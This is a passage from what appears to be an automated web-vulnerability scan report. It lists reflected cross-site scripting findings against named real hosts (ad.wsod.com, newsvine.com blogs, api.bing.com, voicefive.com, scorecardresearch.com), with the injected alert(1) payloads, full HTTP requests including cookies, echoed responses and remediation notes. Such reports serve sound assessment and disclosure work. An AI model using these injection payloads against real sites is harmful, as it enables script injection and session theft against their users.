Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351622**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Geec55"-alert(1)-"8b7e3018d80&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.153. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73e81"-alert(1)-"7c3420db156 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!73e81"-alert(1)-"7c3420db156&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351600**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!73e81"-alert(1)-"7c3420db156&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.154. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 987be"-alert(1)-"f02bf6e0775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&987be"-alert(1)-"f02bf6e0775=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:42:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1683

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&987be"-alert(1)-"f02bf6e0775=1">
...[SNIP]...

5.155. http://alex-johnson.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alex-johnson.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e2c2"-alert(1)-"4c5f2da1b50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?3e2c2"-alert(1)-"4c5f2da1b50=1 HTTP/1.1
Host: alex-johnson.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=325847da6769430ff5ec3a6f9466c9cb; expires=Sat, 25-Jan-2031 17:50:14 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
;currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","2459049","http://alex-johnson.newsvine.com/?3e2c2"-alert(1)-"4c5f2da1b50=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.156. http://api.bing.com/qsonhs.aspx [&q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the &q request parameter is copied into the HTML document as plain text between tags. The payload 5f28f<img%20src%3da%20onerror%3dalert(1)>355803a5d5d was submitted in the &q parameter. This input was echoed as 5f28f<img src=a onerror=alert(1)>355803a5d5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?&q=5f28f<img%20src%3da%20onerror%3dalert(1)>355803a5d5d HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: api.bing.com
Proxy-Connection: Keep-Alive
Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; SRCHD=MS=1593447&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=1

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 8d5672acb8274401a8f8673932dd8dc0
Date: Sat, 29 Jan 2011 23:44:59 GMT
Connection: close

{"AS":{"Query":"5f28f<img src=a onerror=alert(1)>355803a5d5d","FullResults":1}}

5.157. http://api.bing.com/qsonhs.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 15eaa<img%20src%3da%20onerror%3dalert(1)>f5303b63731 was submitted in the q parameter. This input was echoed as 15eaa<img src=a onerror=alert(1)>f5303b63731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?Form=&q=15eaa<img%20src%3da%20onerror%3dalert(1)>f5303b63731 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHD=MS=1615147&SM=1&D=1594248&AF=MSNH14; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 6d6a25edd817430d9e5d8b7e0aeaabaa
Date: Sun, 30 Jan 2011 14:48:40 GMT
Connection: close

{"AS":{"Query":"15eaa<img src=a onerror=alert(1)>f5303b63731","FullResults":1}}

5.158. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 82d4a<script>alert(1)</script>e75189b7ac2 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction82d4a<script>alert(1)</script>e75189b7ac2&n=ar_int_p85001580&1296351015841 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:23 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction82d4a<script>alert(1)</script>e75189b7ac2("");

5.159. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload 94aca<script>alert(1)</script>9dae726c61d was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=4040174094aca<script>alert(1)</script>9dae726c61d HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:22 2011&prad=58087454&arc=4040174094aca%3Cscript%3Ealert%281%29%3C%2Fscript%3E9dae726c61d&; expires=Sat 30-Apr-2011 01:40:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351622; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26660

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"4040174094aca<script>alert(1)</script>9dae726c61d",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("4040174094aca<script>
...[SNIP]...

5.160. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload c39c3<script>alert(1)</script>10cf109dd00 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454c39c3<script>alert(1)</script>10cf109dd00&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:21 2011&prad=58087454c39c3%3Cscript%3Ealert%281%29%3C%2Fscript%3E10cf109dd00&arc=40401740&; expires=Sat 30-Apr-2011 01:40:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351621; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26619

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454c39c3<script>alert(1)</script>10cf109dd00",Pid:"p85001580",Arc:"40401740",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("40401740"),Exp:COMSCORE.BMX.
...[SNIP]...

5.161. http://athima-chansanchai.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://athima-chansanchai.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a87ee"-alert(1)-"2c5f9f4d1a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a87ee"-alert(1)-"2c5f9f4d1a4=1 HTTP/1.1
Host: athima-chansanchai.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=1d1d23b7294c7a0a950c54ae75d3a8dc; expires=Sat, 25-Jan-2031 17:50:30 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
ntCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","5001282","http://athima-chansanchai.newsvine.com/?a87ee"-alert(1)-"2c5f9f4d1a4=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.162. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 95074<script>alert(1)</script>d3dd0e1c31b was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=895074<script>alert(1)</script>d3dd0e1c31b&c2=6135404&c3=15&c4=13236&c5=&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"895074<script>alert(1)</script>d3dd0e1c31b", c2:"6135404", c3:"15", c4:"13236", c5:"", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.163. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 675cf<script>alert(1)</script>5524e2a163a was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=&c6=&c10=3203787675cf<script>alert(1)</script>5524e2a163a&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:01 GMT
Date: Sun, 30 Jan 2011 01:41:01 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"13236", c5:"", c6:"", c10:"3203787675cf<script>alert(1)</script>5524e2a163a", c15:"", c16:"", r:""});

5.164. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 56554<script>alert(1)</script>f33f0880492 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=&c6=&c10=3203787&c15=56554<script>alert(1)</script>f33f0880492 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:02 GMT
Date: Sun, 30 Jan 2011 01:41:02 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"13236", c5:"", c6:"", c10:"3203787", c15:"56554<script>alert(1)</script>f33f0880492", c16:"", r:""});

5.165. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

